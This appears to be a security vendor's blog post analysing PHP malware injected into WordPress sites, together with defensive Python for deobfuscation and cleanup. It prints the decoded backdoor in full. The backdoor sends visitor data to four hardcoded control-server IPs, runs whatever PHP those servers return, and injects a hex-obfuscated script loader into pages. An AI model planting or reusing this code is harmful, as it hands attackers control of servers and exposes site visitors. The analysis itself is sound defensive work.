Research Blog

New Malware – Eval + GetMama + Encoded JavaScript

We are seeing many WordPress sites on shared hosts getting compromised with a piece of malware that injects encoded JavaScript into every page the site serves. The PHP side of it has multiple levels of obfuscation; this is how it starts:

1- Every PHP file on the site gets an eval(base64_decode(...)) line of code added to it:

/*god_mode_on*/eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa..

2- Once executed, that long string decodes (through several nested eval(base64_decode()) layers) to the following PHP (formatted for readability; the original is one long line):

if (!function_exists(GetMama)) {   // bare word: PHP treats it as the string "GetMama"

    // Output-buffer callback: runs over the whole response just before it is sent.
    function opanki($buf) {
        $god_mode = $_SERVER["good"];
        // Count occurrences of "href" and "<?xml" (str_replace's 4th argument is the count).
        str_replace("href", "href", strtolower($buf), $cnt_h);
        str_replace("<?xml", "<?xml", strtolower($buf), $cnt_x);
        // Only HTML with more than two links gets the payload; XML (feeds, sitemaps) is left alone.
        if (($cnt_h > 2) && ($cnt_x == 0)) { $buf = $god_mode . $buf; }
        return $buf;
    }

    function GetMama() { $mother = "www.psite.net"; return $mother; }

    ob_start("opanki");
    $show = false;

    // Phone home to one control server; returns true if it delivered a payload.
    function ahfudflfzdhfhs($pa) {
        global $show; global $god_mode;
        $mama = GetMama();
        $file = urlencode(__FILE__);
        if (isset($_SERVER["HTTP_HOST"]))       { $host = $_SERVER["HTTP_HOST"]; }
        if (isset($_SERVER["REMOTE_ADDR"]))     { $ip   = $_SERVER["REMOTE_ADDR"]; }
        if (isset($_SERVER["HTTP_REFERER"]))    { $ref  = urlencode($_SERVER["HTTP_REFERER"]); }
        if (isset($_SERVER["HTTP_USER_AGENT"])) { $ua   = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"])); }
        // Leaks the infected file's path plus the visitor's host, IP, referer and user agent.
        $url = "http://" . $pa . "/opp.php?mother=" . $mama . "&file=" . $file . "&host=" . $host
             . "&ip=" . $ip . "&ref=" . $ref . "&ua=" . $ua;
        if (function_exists("curl_init")) {
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT, 3);
            $ult = curl_exec($ch);
        } else {
            $ult = @file_get_contents($url);
        }
        // Response containing "eval": strip the marker and run the rest as PHP (a full remote backdoor).
        if (strpos($ult, "eval") !== false) {
            $z = str_replace("eval", "", $ult); eval($z); $show = true; return true;
        }
        // Response containing "ebna": strip the marker and use the rest as the injected payload.
        if (strpos($ult, "ebna") !== false) {
            $z = str_replace("ebna", "", $ult); $god_mode = $z; $show = true; return true;
            $_SERVER["good"] = $god_mode;   // unreachable in the original: it sits after the return
        } else {
            return false;
        }
    }

    // Control servers, tried in order until one answers with a payload.
    $father[] = "146.185.254.245";
    $father[] = "31.184.242.103";
    $father[] = "91.196.216.148";
    $father[] = "91.196.216.49";
    foreach ($father as $ur) { if (ahfudflfzdhfhs($ur)) { break; } }

    // Fallback when no control server answered: a hardcoded, hex-obfuscated loader (decoded in step 3).
    if ($show === false) {
        $script = '<script>var _0x8ab7=["\x31\x34\x36\x2E\x31\x38\x35\x2E\x32\x35\x34\x2E\x32\x34\x35",
"\x33\x31\x2E\x31\x38\x34\x2E\x32\x34\x32\x2E\x31\x30\x33","\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x31\x34\x38",
"\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x34\x39","\x73\x63\x72\x69\x70\x74",
"\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F",
"\x2F\x73\x2E\x70\x68\x70","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65",
"\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];
var _0xa341=[_0x8ab7[0],_0x8ab7[1],_0x8ab7[2],_0x8ab7[3]];
for(var i in _0xa341){var js=document[_0x8ab7[5]](_0x8ab7[4]);js[_0x8ab7[6]]=_0x8ab7[7]+_0xa341[i]+_0x8ab7[8];
var head=document[_0x8ab7[10]](_0x8ab7[9])[0];head[_0x8ab7[11]](js);} ;</script>';
        $god_mode = $script;
    }
    $_SERVER["good"] = $god_mode;
}
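Because the dropper is only ever a chain of eval(base64_decode()) wrappers around a plaintext stage, it can be unwrapped without running any of it. The following Python is an added example, not code from the original post or from the malware: it peels the nested layers statically, pulls the control-server IPs, the GetMama domain and the callback script out of the innermost stage, flags a file for triage, and strips the injected prefix. The sample file it works on is constructed here by re-wrapping a trimmed stand-in for the decoded stage, so the regexes and variable names ($father, $mother, opp.php) are taken from the code above, while the sample itself is not a live capture.

```python
import base64
import binascii
import re

# One obfuscation layer: eval(base64_decode("<base64>")) with either quote style
# and optional whitespace (the sample in step 1 has a space after eval).
LAYER_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*;?'
)
# IoC patterns taken from the decoded stage shown above.
IP_RE = re.compile(r'\$father\[\]\s*=\s*["\'](\d{1,3}(?:\.\d{1,3}){3})["\']')
MOTHER_RE = re.compile(r'\$mother\s*=\s*["\']([^"\']+)["\']')
CALLBACK_RE = re.compile(r'["\']/(\w+\.php)\?')


def peel_layers(code, max_depth=10):
    """Statically unwrap nested eval(base64_decode()) layers.

    Returns (layers, innermost): every decoded layer in order, then the
    final plaintext stage. Nothing is ever executed.
    """
    layers = []
    current = code
    for _ in range(max_depth):
        m = LAYER_RE.search(current)
        if not m:
            break
        try:
            decoded = base64.b64decode(m.group(1), validate=True)
        except binascii.Error:
            break  # truncated or corrupted blob: stop rather than guess
        current = decoded.decode("utf-8", "replace")
        layers.append(current)
    return layers, current


def extract_iocs(stage):
    """Pull control-server IPs, the GetMama domain and the callback script."""
    return {
        "c2_ips": IP_RE.findall(stage),
        "mother": MOTHER_RE.findall(stage),
        "callback": CALLBACK_RE.findall(stage),
    }


def is_infected(code):
    """Triage check to run over every .php file: the marker comment, or any
    eval(base64_decode()) layer, is enough to pull the file for review."""
    return "/*god_mode_on*/" in code or LAYER_RE.search(code) is not None


def clean_file(code):
    """Remove the injected prefix (marker comment plus the eval statement).
    Only the first occurrence is stripped; re-run is_infected() afterwards."""
    return re.sub(r'/\*god_mode_on\*/\s*' + LAYER_RE.pattern, "", code, count=1)


# --- Constructed sample (NOT the live malware): same variable names and
# structure as the decoded stage above, trimmed to what the extraction needs.
INNER_STAGE = (
    'if (!function_exists(GetMama)){'
    'function GetMama(){$mother = "www.psite.net";return $mother;}'
    '$father[] = "146.185.254.245";$father[] = "31.184.242.103";'
    '$father[] = "91.196.216.148";$father[] = "91.196.216.49";'
    '$url = "http://" . $pa . "/opp.php?mother=" . $mama;}'
)


def wrap(stage, depth):
    """Re-create the nesting seen in step 1: base64 the stage and wrap it in
    eval(base64_decode()), `depth` times."""
    for _ in range(depth):
        b64 = base64.b64encode(stage.encode()).decode()
        stage = 'eval(base64_decode("%s"));' % b64
    return stage


SAMPLE_FILE = "<?php /*god_mode_on*/" + wrap(INNER_STAGE, 3) + "\n// legitimate code follows\n"

if __name__ == "__main__":
    layers, final = peel_layers(SAMPLE_FILE)
    print("layers peeled:", len(layers))
    print("iocs:", extract_iocs(final))
    print("infected:", is_infected(SAMPLE_FILE), "-> after clean:", is_infected(clean_file(SAMPLE_FILE)))
```

Stripping the prefix only undoes this particular injection; because the eval branch hands the operators arbitrary code execution on the server, a cleaned site still needs a sweep for other backdoors and a credential reset.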

3- When no control server answers, the hardcoded fallback script is prepended by the opanki() output-buffer callback to every HTML response that has more than two href attributes and no <?xml declaration (so feeds and sitemaps stay clean while pages served to visitors do not). Decoded, it reads:

<script>var _0x8ab7=["146.185.254.245","31.184.242.103","91.196.216.148","91.196.216.49",
"script","createElement","src","http://","/s.php","head","getElementsByTagName","appendChild"];
var _0xa341=[_0x8ab7[0],_0x8ab7[1],_0x8ab7[2],_0x8ab7[3]];
for(var i in _0xa341){var js=document[_0x8ab7[5]](_0x8ab7[4]);js[_0x8ab7[6]]=_0x8ab7[7]+_0xa341[i]+_0x8ab7[8];
var head=document[_0x8ab7[10]](_0x8ab7[9])[0];head[_0x8ab7[11]](js);} ;</script>

Once the browser runs it, the script creates a <script> element for each of the four addresses and appends it to <head>, pulling a remote JavaScript include from http://146.185.254.245/s.php, http://31.184.242.103/s.php, http://91.196.216.148/s.php and http://91.196.216.49/s.php. These are the same four addresses the PHP side phones home to, so blocking them at the network edge cuts both the callback and the browser-side load.
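The fallback loader uses a pattern that shows up in a lot of injected JavaScript: one array of hex-escaped strings, and every sensitive name or URL referenced as an index into it. The Python below is an added example (not from the original post or the malware) that decodes that string table and inlines every lookup so the script reads as plain JavaScript, then reassembles the URLs it would fetch; it works for any loader built this way, not only this sample. The obfuscated input is constructed inside the block from the plaintext table above, so it matches the decoded script in shape and content but is not a capture from a compromised site.

```python
import re

# Plaintext string table in the same order as the loader's _0x8ab7 array.
TABLE_PLAINTEXT = [
    "146.185.254.245", "31.184.242.103", "91.196.216.148", "91.196.216.49",
    "script", "createElement", "src", "http://", "/s.php", "head",
    "getElementsByTagName", "appendChild",
]


def hexify(s):
    """Encode a string as JavaScript \\xHH escapes, the way the loader does."""
    return "".join("\\x%02X" % ord(c) for c in s)


# --- Constructed sample (NOT captured from a site): the loader rebuilt from the
# plaintext table above, with the same array name, lookups and control flow.
OBF_JS = (
    "var _0x8ab7=[" + ",".join('"%s"' % hexify(s) for s in TABLE_PLAINTEXT) + "];"
    "var _0xa341=[_0x8ab7[0],_0x8ab7[1],_0x8ab7[2],_0x8ab7[3]];"
    "for(var i in _0xa341){var js=document[_0x8ab7[5]](_0x8ab7[4]);"
    "js[_0x8ab7[6]]=_0x8ab7[7]+_0xa341[i]+_0x8ab7[8];"
    "var head=document[_0x8ab7[10]](_0x8ab7[9])[0];head[_0x8ab7[11]](js);}"
)

ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})')
TABLE_RE = re.compile(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[((?:\s*"[^"]*"\s*,?)+)\]')
IP_RE = re.compile(r'\d{1,3}(?:\.\d{1,3}){3}')


def decode_js_string(s):
    """Resolve \\xHH and \\uHHHH escapes without handing the string to a JS engine."""
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def deobfuscate(js):
    """Decode the string table and inline every NAME[n] lookup.

    Returns (table, readable_js). Works for any loader built on the
    'hex-escaped array plus index lookups' pattern, not just this sample.
    """
    m = TABLE_RE.search(js)
    if not m:
        raise ValueError("no hex string table found")
    name = m.group(1)
    table = [decode_js_string(s) for s in re.findall(r'"([^"]*)"', m.group(2))]
    lookup = re.compile(re.escape(name) + r'\[(\d+)\]')
    readable = lookup.sub(lambda k: '"%s"' % table[int(k.group(1))], js)
    return table, readable


def loader_urls(table):
    """Reassemble the script URLs the loader builds: scheme + host + path."""
    hosts = [t for t in table if IP_RE.fullmatch(t)]
    scheme = next(t for t in table if t.endswith("://"))
    path = next(t for t in table if t.startswith("/") and t.endswith(".php"))
    return [scheme + h + path for h in hosts]


if __name__ == "__main__":
    table, readable = deobfuscate(OBF_JS)
    print(readable)
    for url in loader_urls(table):
        print("indicator:", url)
```

Run against the real fallback, the readable output shows document["createElement"]("script") and head["appendChild"](js) in place of the index lookups, and loader_urls() gives the four /s.php addresses to block or hunt for in proxy logs.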

 

It is a very nasty piece of code, and we are seeing hundreds (if not thousands) of sites with it. Note that the eval branch in step 2 lets the control server run arbitrary PHP on the host, so removing the injected line alone does not close the door: the whole site needs to be checked for other backdoors and its credentials rotated.

 

If your site is compromised, sign up with us and we will fix it for you: http://sucuri.net/signup

 
